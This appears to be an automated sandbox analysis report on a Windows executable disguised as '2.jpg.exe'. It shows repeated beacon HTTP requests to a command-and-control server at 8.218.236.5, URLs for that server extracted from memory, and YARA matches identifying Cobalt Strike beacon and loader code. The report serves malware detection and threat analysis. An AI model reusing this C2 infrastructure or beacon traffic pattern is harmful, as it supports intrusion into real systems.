Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache

Source: 2.jpg.exe, 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:%u/
Source: 2.jpg.exe, 00000000.00000002.4124429713.0000000000A17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://8.218.236.5/
Source: 2.jpg.exe, 00000000.00000002.4125543545.0000000005D46000.00000004.00000020.00020000.00000000.sdmp, 2.jpg.exe, 00000000.00000002.4124429713.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, 2.jpg.exe, 00000000.00000002.4124429713.0000000000A17000.00000004.00000020.00020000.00000000.sdmp, 2.jpg.exe, 00000000.00000002.4124429713.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://8.218.236.5:8062/g.pixel
Source: 2.jpg.exe, 00000000.00000002.4124429713.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://8.218.236.5:8062/g.pixelHeartbeatTimesg
Source: 2.jpg.exe, 00000000.00000002.4124429713.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://8.218.236.5:8062/g.pixelitoringKillbit
Source: 2.jpg.exe, 00000000.00000002.4124429713.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://8.218.236.5:8062/g.pixelitoringKillbitS
Source: 2.jpg.exe, 00000000.00000002.4124429713.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://8.218.236.5:8062/g.pixelnkMonitoringM
Source: 2.jpg.exe, 00000000.00000002.4124429713.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://8.218.236.5:8062/g.pixelnkMonitoringx
Source: 2.jpg.exe, 00000000.00000002.4124429713.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, 2.jpg.exe, 00000000.00000002.4124429713.0000000000A17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://8.218.236.5:8062/j9sF
Source: 2.jpg.exe, 00000000.00000002.4124429713.0000000000A17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://8.218.236.5:8062/j9sF6
Source: 2.jpg.exe, 00000000.00000002.4124836777.00000000026A8000.00000004.00000800.00020000.00000000.sdmp, 2.jpg.exe, 00000000.00000002.4124836777.000000000268F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://8.218.236.5:8089
Source: 2.jpg.exe	String found in binary or memory: http://8.218.236.5:8089/0.txtC
Source: 2.jpg.exe, 00000000.00000002.4124836777.0000000002621000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://8.218.236.5:8089/0.txtP
Source: 2.jpg.exe, 00000000.00000002.4124836777.0000000002621000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://8.218.236.5:8089/0.txtlB
Source: 2.jpg.exe	String found in binary or memory: http://8.218.236.5:8089/1.txt
Source: 2.jpg.exe, 00000000.00000002.4124836777.00000000026C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://8.218.236.5:8089/1.txtP
Source: 2.jpg.exe, 00000000.00000002.4124836777.000000000268F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://8.218.236.5:8089/1.txtd
Source: 2.jpg.exe, 00000000.00000002.4124836777.0000000002621000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://8.218.236.5:8089/1.txter
Source: 2.jpg.exe, 00000000.00000002.4124836777.000000000268F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://8.218.236.5:8089t-
Source: 2.jpg.exe, 00000000.00000002.4124836777.000000000268F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.2.jpg.exe.6760000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 0.2.2.jpg.exe.6760000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 0.2.2.jpg.exe.6760000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 0.2.2.jpg.exe.6760000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 0.2.2.jpg.exe.6760000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 0.2.2.jpg.exe.6760000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
